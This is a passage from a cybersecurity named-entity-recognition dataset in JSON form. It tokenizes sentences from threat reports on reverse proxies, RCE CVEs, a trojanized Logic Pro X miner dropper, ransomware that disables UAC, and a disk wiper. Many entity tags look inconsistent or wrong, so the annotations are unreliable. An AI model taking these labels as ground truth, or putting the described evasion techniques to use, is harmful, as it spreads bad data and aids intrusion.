"O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Reverse", + "proxy", + "tool" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Reverse", + "proxy", + "tool" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "actor", + "uploaded", + "the", + "fast", + "reverse", + "proxy", + "(FRP)", + "binary" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "One", + "of", + "the", + "main", + "initial", + "access", + "vector", + "is", + "exploitation", + "of", + "publicly", + "exposed", + "web", + "services." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Initial", + "Compromise", + "Through", + "Exploiting", + "Publicly", + "Facing", + "Applications" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "primarily", + "focuses", + "on", + "four", + "different", + "known", + "remote", + "code", + "execution", + "(RCE)", + "vulnerabilities", + "during", + "their", + "operations:•", + "CVE-2023-21839", + "Oracle", + "WebLogic", + "Server", + "RCE", + "[13]•", + "CVE-2021-3129", + "Laravel", + "debug", + "mode", + "RCE", + "[14]•", + "CVE-2020-2551", + "Oracle", + "WebLogic", + "RCE", + "[15]•", + "CVE-2021-44228", + "Apache", + "Log4j", + "[16]" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "victim", + "IP", + "address", + "was", + "publicly", + "serving", + "a", + "web", + "service", + "that", + "contained", + "a", + "phpMyAdmin", + "database." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "primarily", + "focused", + "on", + "exploiting", + "four", + "different", + "remote", + "code", + "execution", + "(RCE)", + "vulnerabilities", + "to", + "target", + "web", + "services" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decrypting", + "and", + "exporting", + "browser", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "decryption", + "key", + "for", + "the", + "ZIP", + "folder", + "and", + "access", + "the", + "tool" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "distributed", + "inside", + "an", + "encrypted", + "ZIP", + "folder." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "executed", + "the", + "\"tasklist", + "/SVC\"", + "command", + "to", + "list", + "all", + "running", + "processes", + "on", + "the", + "victim", + "device." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deleted", + "the", + "LaZagne", + "binary", + "after", + "execution", + "to", + "avoid", + "detection", + "from", + "the", + "user's", + "side." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actor", + "leveraged", + "ONE-FOX", + "-", + "a", + "collection", + "of", + "pentest", + "tools", + "-", + "to", + "copy", + "binaries", + "from", + "actor´s", + "system", + "to", + "the", + "victim." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Recording", + "keystrokes", + "in", + "real", + "time", + "with", + "offline", + "logging", + "available" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Downloading", + "files", + "remotely" + ], + "ner_tags": [ + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "the", + "dropper", + "then", + "downloads", + "a", + "custom", + "XMRig", + "miner" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "script", + "to", + "download,", + "configure", + "and", + "execute" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "download", + "the", + "XMRig", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "pulls", + "the", + "XMRig", + "payload" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "generating", + "a", + "script", + "to", + "decode", + "the", + "legitimate", + "Mach-O", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "is", + "decoded", + "and", + "unarchived" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "value", + "is", + "decoded" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Logic", + "Pro", + "X", + "dropper", + "binary", + "is", + "deleted", + "with", + "the", + "/tmp/", + "bundle" + ], + "ner_tags": [ + "O", + "I-SamFile", + "I-SamFile", + "B-SecTeam", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "In", + "order", + "to", + "unpack", + "the", + "legitimate", + "binary," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "binary", + "unpacks", + "a", + "customized", + "Mach-O" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "previously", + "written", + "Base64", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Files", + "are", + "dropped/downloaded", + "as", + "Base64-encoded", + "archives." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "script", + "first", + "deletes", + "itself", + "from", + "the", + "disk." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "removes", + "any", + "files" + ], + "ner_tags": [ + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "deleted", + "every", + "time" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "script", + "then", + "removes", + "any", + "files" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "script", + "removes", + "the", + "i2pd", + "Mach-O", + "file", + "from", + "the", + "disk." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Even", + "though", + "the", + "scripts", + "produce", + "many", + "on-disk", + "artifacts,", + "the", + "dropper", + "and", + "scripts", + "are", + "quick", + "to", + "remove", + "them" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Files", + "are", + "deleted", + "after", + "use." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "proxy", + "the", + "miner’s", + "network", + "communications." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Idus", + "O", + "O" + ] + }, + { + "tokens": [ + "mining", + "proxy." + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "usage", + "of", + "a", + "proxy", + "allows", + "authors", + "to", + "control", + "all", + "of", + "their", + "mining", + "implants", + "and", + "their", + "target", + "pools", + "via", + "a", + "centralized", + "console" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "mining", + "proxy" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "command", + "line", + "arguments" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "executed", + "as", + "a", + "command", + "line", + "argument" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "padded", + "i2pd", + "Mach-O", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "pads", + "the", + "resulting", + "Mach-O", + "with", + "a", + "random", + "number", + "of", + "\\x00", + "bytes" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "binaries", + "are", + "padded", + "with", + "a", + "random", + "number", + "of", + "zero", + "bytes", + "to", + "change", + "its", + "hash", + "and", + "expand", + "its", + "size." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "padded", + "with", + "a", + "random", + "number", + "of", + "\\x00", + "bytes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "user", + "will", + "continue", + "to", + "execute", + "the", + "dropper" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "The", + "dropper", + "is", + "executed", + "by", + "the", + "user." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "As", + "long", + "as", + "the", + "dropper", + "successfully", + "launches", + "its", + "legitimate", + "application" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "dropper", + "bundle", + "in", + "the", + "applications", + "folder", + "appears", + "legitimate," + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "authors", + "cleverly", + "utilized", + "these", + "legitimate", + "dependencies", + "via", + "symbolic", + "links", + "when", + "dynamically", + "creating", + "the", + "legitimate", + "bundle", + "in", + "the", + "temp", + "folder." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "dropper", + "is", + "installed", + "into", + "a", + "legitimate", + "file", + "path,", + "posing", + "as", + "the", + "legitimate", + "application." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "utilize", + "legitimate", + "file", + "paths", + "to", + "mask", + "their", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "order", + "to", + "appear", + "as", + "a", + "working", + "copy", + "of", + "Logic", + "Pro", + "X,", + "the", + "dropper", + "contains", + "a", + "legitimate", + "copy", + "of", + "the", + "lure", + "application" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "mirrored", + "bundle", + "contains", + "the", + "legitimate", + "application", + "instead", + "of", + "the", + "dropper", + "binary." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "mirror", + "all", + "directories", + "found", + "in", + "/Applications/Logic", + "Pro", + "X.app/Contents", + "and", + "/Applications/Logic", + "Pro", + "X.app/Contents/MacOS", + "to", + "their", + "respective", + "/tmp/", + "locations" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malicious", + "dropper", + "contains", + "a", + "legitimate", + "version", + "of", + "the", + "software", + "and", + "executes", + "it", + "to", + "give", + "the", + "illusion", + "of", + "a", + "properly", + "behaving", + "application." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "check", + "using", + "pgrep", + "for", + "Activity", + "Monitor", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "proxy", + "server", + "is", + "located", + "on", + "the", + "I2P", + "network", + "at", + "the", + "destination", + "of", + "the", + "pool", + "tunnel" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "config", + "via", + "the", + "XMRig", + "miner’s", + "native", + "API." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "By", + "modifying", + "the", + "below", + "registry", + "value", + "EnableLUA", + "to", + "“0”" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "ConsentPromptBehaviorAdmin", + "key", + "has", + "been", + "set", + "to", + "“0”,", + "indicating", + "that", + "the", + "behavior", + "of", + "the", + "consent", + "prompt", + "for", + "actions", + "requiring", + "administrator", + "privileges", + "has", + "been", + "modified" + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "ransomware", + "modifies", + "specific", + "registry", + "values" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malware", + "aims", + "to", + "deactivate", + "User", + "Account", + "Control", + "(UAC)", + "on", + "the", + "target", + "system" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "UAC", + "BYPASS" + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg" + ] + }, + { + "tokens": [ + "to", + "disable", + "User", + "Access", + "Control", + "(UAC),", + "a", + "security", + "feature", + "in", + "Windows" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "By", + "deactivating", + "UAC,", + "the", + "ransomware", + "gets", + "elevated", + "privileges", + "without", + "requiring", + "user", + "permission", + "or", + "administrator", + "credentials" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "bypassing", + "UAC" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "ransomware", + "uses", + "the", + "FindFirstVolumeW()", + "and", + "FindNextVolumeW()", + "API", + "functions" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "the", + "FindFirstFileW()", + "and", + "FindNextFileW()", + "API", + "functions." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "leverages", + "various", + "functions", + "from", + "the", + "CryptoAPI,", + "including", + "CryptAcquireContextW(),", + "CryptImportKey(),", + "CryptSetKeyParam(),", + "and", + "CryptEncrypt()." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "using", + "the", + "MoveFileExW()", + "API", + "function," + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "search", + "and", + "identify", + "accessible", + "volumes", + "on", + "the", + "targeted", + "system." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "proceeds", + "to", + "identify", + "files", + "and", + "directories", + "for", + "encryption", + "by", + "iterating", + "through", + "them" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "function", + "scans", + "a", + "specified", + "path", + "by", + "finding", + "all", + "files", + "within", + "the", + "given", + "directory", + "and", + "its", + "subdirectories." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "iterates", + "over", + "each", + "volume", + "to", + "search", + "for", + "specific", + "files", + "related", + "to", + "virtual", + "machines." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "function", + "scans", + "VM", + "volumes", + "on", + "an", + "ESXi", + "server." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "scanning", + "files", + "in", + "a", + "specified", + "or", + "generic", + "path" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "iterates", + "over", + "each", + "volume", + "to", + "find", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "command", + "uses", + "the", + "Windows", + "Management", + "Instrumentation", + "Command-line", + "(WMIC)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "This", + "function", + "is", + "responsible", + "for", + "deleting", + "all", + "files", + "and", + "directories", + "in", + "the", + "user’s", + "trash", + "folder." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "by", + "passing", + "the", + "file", + "path", + "to", + "be", + "encrypted", + "as", + "an", + "argument." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "removes", + "log", + "files", + "and", + "temporary", + "files", + "from", + "the", + "root", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "also", + "deletes", + "the", + "ransomware,", + "script", + "file,", + "and", + "ransom", + "note", + "(index.html),", + "ensuring", + "that", + "no", + "evidence", + "remains", + "on", + "the", + "compromised", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "B-Way", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "uses", + "the", + "esxcli", + "command", + "to", + "list", + "all", + "VM", + "processes" + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "configuring", + "autorun", + "entries," + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "through", + "legitimate", + "remote", + "access", + "software", + "such", + "as", + "AnyDesk" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "invoked", + "the", + "wave", + "2", + "ransomware", + "immediately", + "from", + "the", + "command", + "line" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "both", + "use", + "CreateFile", + "and", + "WriteFile", + "APIs" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "using", + "DeviceControl", + "API", + "methods" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "of", + "the", + "same", + "DeviceControl", + "API", + "methods" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DeviceControl", + "API", + "methods" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DeviceControl", + "API", + "methods" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ransomware", + "attempts", + "to", + "decrypt" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RC4", + "key", + "for", + "decryption" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "RC4", + "decryption", + "method", + "uses", + "CryptoAPI", + "(CryptDecrypt)", + "instead", + "of", + "the", + "usual", + "substitution", + "box", + "method" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "execute", + "embedded", + "scripts" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Embedding", + "of", + "EldoS", + "RawDisk", + "driver", + "inside", + "the", + "wiper", + "malware" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "embedded", + "the", + "signed", + "raw", + "disk", + "driver", + "in", + "the", + "wiper", + "executable" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "raw", + "disk", + "driver", + "was", + "embedded", + "inside", + "the", + "malware" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "download", + "and", + "launch", + "of", + "a", + "suspicious", + "batch", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "actor", + "introduced", + "a", + "downloader", + "to", + "fetch", + "and", + "spawn", + "the", + "next", + "stage", + "payload" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malicious", + "document", + "connects", + "to", + "the", + "remote", + "server", + "and", + "downloads", + "the", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "install", + "additional", + "malware" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "They", + "then", + "returned", + "18", + "hours", + "later", + "to", + "install", + "further", + "malware" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "when", + "the", + "malicious", + "Word", + "document", + "opens", + "it", + "fetches", + "the", + "next", + "payload", + "from", + "the", + "remote", + "server:" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "fetched", + "an", + "additional", + "script", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "different", + "method", + "of", + "fetching", + "and", + "executing", + "the", + "next", + "stage", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "file", + "downloaded", + "from", + "the", + "internet," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "fetch", + "the", + "next", + "stage", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "the", + "fetched", + "data", + "by", + "cURL", + "command" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fetch", + "the", + "payload", + "with", + "cURL", + "command" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "fetching", + "the", + "next", + "stage", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "fetching", + "a", + "remote", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "fetches", + "a", + "payload", + "from", + "the", + "embedded", + "URL", + "and", + "loads", + "it." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "launch", + "of", + "a", + "suspicious", + "batch", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "Batch", + "script" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "operator", + "executed", + "several", + "Windows", + "commands" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd.exe", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "batch", + "file" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "batch", + "file", + "name" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "scriptlet", + "of", + "the", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd.exe\"", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd.exe\"", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "Windows", + "Batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "script", + "is", + "for", + "executing", + "the", + "PowerShell", + "script", + "via", + "a", + "Windows", + "scheduled", + "task" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "displays", + "a", + "warning", + "message", + "when", + "the", + "user", + "tries", + "to", + "open", + "a", + "file", + "downloaded", + "from", + "the", + "internet." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "strategy", + "to", + "persuade", + "the", + "victim", + "to", + "execute", + "the", + "malicious", + "shortcut", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executed", + "when", + "the", + "victim", + "double-clicked", + "on", + "the", + "shortcut", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "executable", + "ieinstal.exe", + "was", + "used", + "to", + "bypass", + "UAC." + ], + "ner_tags": [ + "O", + 